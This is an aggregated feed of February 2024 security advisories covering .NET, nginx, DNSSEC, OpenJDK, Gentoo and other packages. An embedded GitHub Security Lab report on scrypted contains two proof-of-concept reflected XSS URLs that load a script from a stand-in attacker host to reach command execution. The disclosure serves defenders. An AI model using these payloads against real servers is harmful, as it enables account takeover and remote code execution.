* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0805
13.02.2024 02:00:00 | redhat | [RHSA-2024:0807] dotnet6.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0807
13.02.2024 17:08:22 | npm | [NPM:GHSA-4W4V-5HC9-XRR2] angular vulnerable to super-linear runtime due to backtracking (high) | This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With a large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4W4V-5HC9-XRR2
14.02.2024 19:15:15 | nginx | [NGINX:CVE-2024-24989] NULL pointer dereference in HTTP/3 (major) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-24989
14.02.2024 19:15:15 | nginx | [NGINX:CVE-2024-24990] Use-after-free in HTTP/3 (major) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-24990
14.02.2024 18:15:45 | alpinelinux | [ALPINE:CVE-2023-50387] pdns-recursor, unbound, dnsmasq, knot-resolver, bind vulnerability | [From CVE-2023-50387] Certain DNSSEC aspects of the DNS protocol (in RFC 4035 and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses when there is a zone with many DNSKEY and RRSIG records, aka the "KeyTrap" issue. The protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-50387
14.02.2024 18:15:45 | alpinelinux | [ALPINE:CVE-2023-50868] pdns-recursor, unbound, dnsmasq, knot-resolver, bind vulnerability | [From CVE-2023-50868] The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-50868
14.02.2024 17:08:24 | maven | [MAVEN:GHSA-5MP4-32RR-V3X5] Absolute path traversal vulnerability in digdag server (moderate)
### Summary
Treasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally.
### Impact
This issue may lead to Information Disclosure.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5MP4-32RR-V3X5
14.02.2024 12:26:35 | almalinux | [ALSA-2024:0811] sudo security update (moderate) | sudo security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0811
14.02.2024 10:00:00 | msrc | [MS:CVE-2024-21357] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21357
14.02.2024 10:00:00 | msrc | [MS:CVE-2024-21413] Microsoft Outlook Remote Code Execution Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21413
14.02.2024 10:00:00 | msrc | [MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
15.02.2024 00:53:16 | rubysec | [RUBYSEC:SIDEKIQ-UNIQUE-JOBS-2024-25122] sidekiq-unique-jobs UI server vulnerable to XSS & RCE in Redis (high)
Cross site scripting (XSS) potentially exposing cookies / sessions / localStorage, fixed by sidekiq-unique-jobs v8.0.7.
### Details
Specially crafted URL query parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI, allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link, to successfully execute malicious code, which could potentially steal cookies, session data, or local storage data from the app the sidekiq-unique-jobs web UI is mounted in.
If your sidekiq-unique-jobs web UI is mounted at `/sidekiq`, the vulnerable paths and query parameters are:
* `/sidekiq/changelogs`
  * `filter`
  * `count`
* `/sidekiq/locks`
  * `filter`
  * `count`
* `/sidekiq/expiring_locks`
  * `filter`
### Impact
This is a vulnerability of critical severity, which impacts many thousands of sites, since sidekiq-unique-jobs is widely deployed across the industry, with multiple attack vectors.
### Patches
The fix for the XSS vulnerability was released in sidekiq-unique-jobs v8.0.7.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:SIDEKIQ-UNIQUE-JOBS-2024-25122
14.02.2024 12:42:15 | almalinux | [ALSA-2024:0786] nss security update (moderate) | nss security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0786
14.02.2024 12:34:28 | almalinux | [ALSA-2024:0790] nss security update (moderate) | nss security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0790
15.02.2024 22:18:21 | go | [GO-2024-2534] Unauthenticated cross-site scripting in github.com/rancher/apiserver | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2534
15.02.2024 20:15:44 | alpinelinux | [ALPINE:CVE-2023-6937] wolfssl vulnerability | [From CVE-2023-6937] wolfSSL prior to 5.6.6 did not check that messages in one (D)TLS record do not span key boundaries. As a result, it was possible to combine (D)TLS messages using different keys into one (D)TLS record. The most extreme edge case is that, in (D)TLS 1.3, it was possible that an unencrypted (D)TLS 1.3 record from the server containing first a ServerHello message and then the rest of the first server flight would be accepted by a wolfSSL client. In (D)TLS 1.3 the handshake is encrypted after the ServerHello but a wolfSSL client would accept an unencrypted flight from the server. This does not compromise key negotiation and authentication so it is assigned a low severity rating. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6937
15.02.2024 02:00:00 | cisa | [CISA-2024:0215] CISA Adds 2 Known Exploited Vulnerabilities to Catalog | CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0215
15.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0805] dotnet7.0 security update (important) | [7.0.116-1.0.1] - Update to .NET SDK 7.0.116 and Runtime 7.0.16 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0805
15.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0806] dotnet7.0 security update (important) | [7.0.116-1.0.1] - Update to .NET SDK 7.0.116 and Runtime 7.0.16 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0806
15.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0807] dotnet6.0 security update (important) | [6.0.127-1.0.1] - Update to .NET SDK 6.0.127 and Runtime 6.0.27 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0807
15.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0808] dotnet6.0 security update (important) | [6.0.127-1.0.1] - Update to .NET SDK 6.0.127 and Runtime 6.0.27 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0808
15.02.2024 02:00:00 | redhat | [RHSA-2024:0827] .NET 8.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0827
15.02.2024 02:00:00 | redhat | [RHSA-2024:0848] .NET 8.0 security update (important)
.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.
Security Fix(es):
* dotnet: Denial of Service in SignalR server (CVE-2024-21386)
* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0848
15.02.2024 02:00:00 | freebsd | [FREEBSD:C97A4ECF-CC25-11EE-B0EE-0050569F0B83] nginx-devel -- Multiple Vulnerabilities in HTTP/3 | The nginx development team reports: When using HTTP/3 a segmentation fault might occur in a worker process while processing a specially crafted QUIC session. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C97A4ECF-CC25-11EE-B0EE-0050569F0B83
15.02.2024 10:00:00 | msrc | [MS:CVE-2024-21329] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21329
15.02.2024 10:00:00 | msrc | [MS:CVE-2024-21338] Windows Kernel Elevation of Privilege Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21338
15.02.2024 10:00:00 | msrc | [MS:CVE-2024-21351] Windows SmartScreen Security Feature Bypass Vulnerability (moderate) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21351
15.02.2024 10:00:00 | msrc | [MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
15.02.2024 10:00:00 | msrc | [MS:CVE-2024-21412] Internet Shortcut Files Security Feature Bypass Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21412
15.02.2024 11:08:20 | almalinux | [ALSA-2024:0808] dotnet6.0 security update (important) | dotnet6.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0808
15.02.2024 12:05:08 | almalinux | [ALSA-2024:0806] dotnet7.0 security update (important) | dotnet7.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0806
15.02.2024 11:13:23 | almalinux | [ALSA-2024:0807] dotnet6.0 security update (important) | dotnet6.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0807
15.02.2024 11:17:54 | almalinux | [ALSA-2024:0805] dotnet7.0 security update (important) | dotnet7.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0805
17.02.2024 01:14:46 | maven | [MAVEN:GHSA-8H4X-XVJP-VF99] Hazelcast Platform permission checking in CSV File Source connector (moderate)
### Impact
In Hazelcast Platform through 5.3.4, a security issue exists within the SQL mapping for the CSV File Source connector. This issue arises from inadequate permission checking, which could enable unauthorized clients to access data from files stored on a member's filesystem.
### Patches
Fix versions: 5.3.5, 5.4.0-BETA-1
### Workaround
Disabling the Hazelcast Jet processing engine in the Hazelcast member configuration works around the issue. As a result, SQL and Jet jobs won't work.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8H4X-XVJP-VF99
16.02.2024 21:29:34 | npm | [NPM:GHSA-W4HV-VMV9-HGCR] GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219` (high)
# GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219`

The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [scrypted](https://github.com/koush/scrypted).

We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-218` or `GHSL-2023-219` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are _NOT_ the correct point of contact for this report, please let us know!

## Summary

Two reflected Cross-Site Scripting (XSS) vulnerabilities exist in scrypted that may allow an attacker to impersonate any user who clicks on specially crafted links. In the worst case, an attacker may be able to impersonate an administrator and run arbitrary commands.

## Project

scrypted

## Tested Version

[v55.0](https://github.com/koush/scrypted/releases/tag/v0.55.0)

## Details

### Issue 1: reflected XSS in [`plugin-http.ts`](https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/src/plugin/plugin-http.ts#L45) (`GHSL-2023-218`)

The `owner` and `pkg` parameters are reflected back in the response when the endpoint is not found, allowing for a reflected XSS vulnerability.

```javascript
const { owner, pkg } = req.params;
let endpoint = pkg;
if (owner)
    endpoint = `@${owner}/${endpoint}`;
const pluginData = await this.getEndpointPluginData(req, endpoint, isUpgrade, isEngineIOEndpoint);
if (!pluginData) {
    end(404, `Not Found (plugin or device "${endpoint}" not found)`);
    return;
}
```

#### Impact

This issue may lead to `Remote Code Execution`.

#### Remediation

In order to remediate, ensure that parameters are not reflected back in the response. In addition, on error responses where html is unnecessary, set the `text/plain` Content-Type to prevent XSS (express defaults to text/html).

#### Resources

Proof of Concept:

The following url will create a script tag in the current document which will load `attacker.domain/rce.js`. This JavaScript file can then be used to communicate with the server over HTTP via RPC, and send some requests to get the `nativeId` and `proxyID` for the `automation:update-plugins` and achieve the ability to run shell commands at a specified time.

https://localhost:10443/endpoint/%3Cimg%20src%20onerror=a=document.createElement('script');a.setAttribute('src',document.location.hash.substr(1));document.head.appendChild(a)%3E/pkg#//attacker.domain/rce.js

In the browser, you should see the script element be created with the src as `https://attacker.domain/rce.js`.

### Issue 2: reflected XSS in [`plugins/core/ui/src/Login.vue`](https://github.com/koush/scrypted/blob/v0.55.0/plugins/core/ui/src/Login.vue#L79) (`GHSL-2023-219`)

A reflected XSS vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login.

```javascript
try {
    const redirect_uri = new URL(window.location).searchParams.get('redirect_uri');
    if (redirect_uri) {
        window.location = redirect_uri;
        return;
    }
}
```

#### Impact

This issue may lead to `Remote Code Execution`.

#### Remediation

In order to remediate, ensure user-controlled data is not placed into the DOM. Additionally, this is also an open redirect vulnerability because the url is not validated and a user may be redirected to an attacker controlled website after logging in, not knowing they have left the actual real website. If this redirect_uri parameter is supposed to only redirect to the current website/domain, please incorporate a check that it is only redirecting to the current domain.

#### Resources

Proof of Concept:

When the user is not logged in, send a link to the server with the parameter: `redirect_uri=javascript:var script = document.createElement('script');script.src = 'https://attacker.domain'; document.head.appendChild(script);` at the end of the uri (but before the #).

Example: `https://localhost:10443/endpoint/test/test?redirect_uri=javascript:var%20script%20=%20document.createElement('script');script.src%20=%20'https://attacker.domain';%20document.head.appendChild(script);#//`

Similar to Proof of Concept 1 this will load a JavaScript file which can make authenticated requests to the server, possibly leading to RCE.

## GitHub Security Advisories

We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).

## Credit

These issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).

This vulnerability was found with the help of [CodeQL Reflected XSS query](https://codeql.github.com/codeql-query-help/javascript/js-reflected-xss/).

## Contact

You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-218` or `GHSL-2023-219` in any communication regarding these issues.

## Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W4HV-VMV9-HGCR
16.02.2024 18:02:59 | npm | [NPM:GHSA-3787-6PRV-H9W3] Undici proxy-authorization header not cleared on cross-origin redirect in fetch (low)

### Impact

Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authorization` headers.

### Patches

This is patched in v5.28.3 and v6.6.1.

### Workarounds

There are no known workarounds.

### References

- https://fetch.spec.whatwg.org/#authentication-entries
- https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3787-6PRV-H9W3
16.02.2024 17:59:40 | npm | [NPM:GHSA-9F24-JQHM-JFCW] fetch(url) leads to a memory leak in undici (moderate)

### Impact

Calling `fetch(url)` and not consuming the incoming body (or consuming it very slowly) will lead to a memory leak.

### Patches

Patched in v6.6.1.

### Workarounds

Make sure to always consume the incoming body.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9F24-JQHM-JFCW
17.02.2024 01:37:07 | npm | [NPM:GHSA-PMGM-H3CC-M4HJ] React Native Document Picker Directory Traversal vulnerability (moderate)
Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMGM-H3CC-M4HJ

16.02.2024 02:00:00 | debian | [DSA-5625-1] engrampa
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5625-1

16.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0848] .NET 8.0 security update (important)
[8.0.102-2.0.1]
- Update to .NET SDK 8.0.102 and Runtime 8.0.2
- Add -dbg subpackages for symbol files
- Resolves: RHEL-23070
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0848

16.02.2024 12:14:33 | almalinux | [ALSA-2024:0827] .NET 8.0 security update (important)
.NET 8.0 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0827

16.02.2024 13:50:40 | almalinux | [ALSA-2024:0848] .NET 8.0 security update (important)
.NET 8.0 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0848

16.02.2024 02:00:00 | freebsd | [FREEBSD:E15BA624-CCA8-11EE-84CA-B42E991FC52E] powerdns-recursor -- Multiple Vulnerabilities

cve@mitre.org reports:

CVE-2023-50868: The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.

CVE-2023-50387: Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.

https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E15BA624-CCA8-11EE-84CA-B42E991FC52E
17.02.2024 04:15:48 | alpinelinux | [ALPINE:CVE-2024-20945] openjdk11, openjdk21, openjdk17 vulnerability
[From CVE-2024-20945] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20945

17.02.2024 04:15:46 | alpinelinux | [ALPINE:CVE-2024-20919] openjdk11, openjdk17, openjdk21 vulnerability
[From CVE-2024-20919] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20919

17.02.2024 04:15:46 | alpinelinux | [ALPINE:CVE-2024-20921] openjdk17, openjdk21, openjdk11 vulnerability
[From CVE-2024-20921] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20921
18.02.2024 02:00:00 | debian | [DSA-5626-1] pdns-recursor
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5626-1

18.02.2024 02:00:00 | gentoo | [GLSA-202402-17] CUPS: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in CUPS, the worst of which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-17

18.02.2024 02:00:00 | gentoo | [GLSA-202402-12] GNU Tar: Out of Bounds Read (high)
A vulnerability has been discovered in GNU Tar which may lead to an out of bounds read.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-12

18.02.2024 02:00:00 | gentoo | [GLSA-202402-13] TACACS+: Remote Code Execution (high)
A vulnerability has been discovered in TACACS+ which could lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-13

18.02.2024 02:00:00 | gentoo | [GLSA-202402-14] QtWebEngine: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-14

18.02.2024 02:00:00 | gentoo | [GLSA-202402-15] e2fsprogs: Arbitrary Code Execution (high)
A vulnerability has been discovered in e2fsprogs which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-15

18.02.2024 02:00:00 | gentoo | [GLSA-202402-16] Apache Log4j: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in Apache Log4j, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-16

18.02.2024 02:00:00 | gentoo | [GLSA-202402-18] Exim: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in Exim, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-18

18.02.2024 02:00:00 | gentoo | [GLSA-202402-19] libcaca: Arbitrary Code Execution (normal)
A vulnerability has been discovered in libcaca which can lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-19

18.02.2024 02:00:00 | gentoo | [GLSA-202402-20] Thunar: Arbitrary Code Execution (normal)
A vulnerability has been discovered in Thunar which may lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-20

18.02.2024 02:00:00 | gentoo | [GLSA-202402-21] QtNetwork: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in QtNetwork, the worst of which could lead to execution of arbitrary code.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-21
18.02.2024 06:06:15 | rustsec | [RUSTSEC-2024-0014] `generational-arena` is unmaintained

The `generational-arena` crate's repository has been archived and is no longer maintained.

## Alternatives

- [slotmap](https://crates.io/crates/slotmap)

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0014

19.02.2024 02:00:00 | gentoo | [GLSA-202402-28] Samba: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in Samba, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-28

19.02.2024 02:00:00 | redhat | [RHSA-2024:0857] python-pillow security update (important)

The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.

Security Fix(es):

* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0857

19.02.2024 02:00:00 | redhat | [RHSA-2024:0861] gimp:2.8 security update (important)

The GIMP (GNU Image Manipulation Program) is an image composition and editing program. GIMP provides a large image manipulation toolbox, including channel operations and layers, effects, sub-pixel imaging and anti-aliasing, and conversions, all with multi-level undo.

Security Fix(es):

* gimp: PSD buffer overflow RCE (CVE-2023-44442)
* gimp: psp off-by-one RCE (CVE-2023-44444)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0861

19.02.2024 02:00:00 | redhat | [RHSA-2024:0866] java-1.8.0-ibm security update (moderate)

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)
* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)
* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0866
19.02.2024 19:16:28 | rustsec | [RUSTSEC-2024-0016] dav1d AV1 decoder integer overflow
An integer overflow in the dav1d AV1 decoder can occur when decoding videos with a large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading to version 0.7.0 of libdav1d-sys, which includes dav1d 1.4.0.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0016
19.02.2024 02:00:00 | gentoo | [GLSA-202402-22] intel-microcode: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in intel-microcode, the worst of which can lead to privilege escalation.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-22

19.02.2024 02:00:00 | gentoo | [GLSA-202402-23] Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities (high)
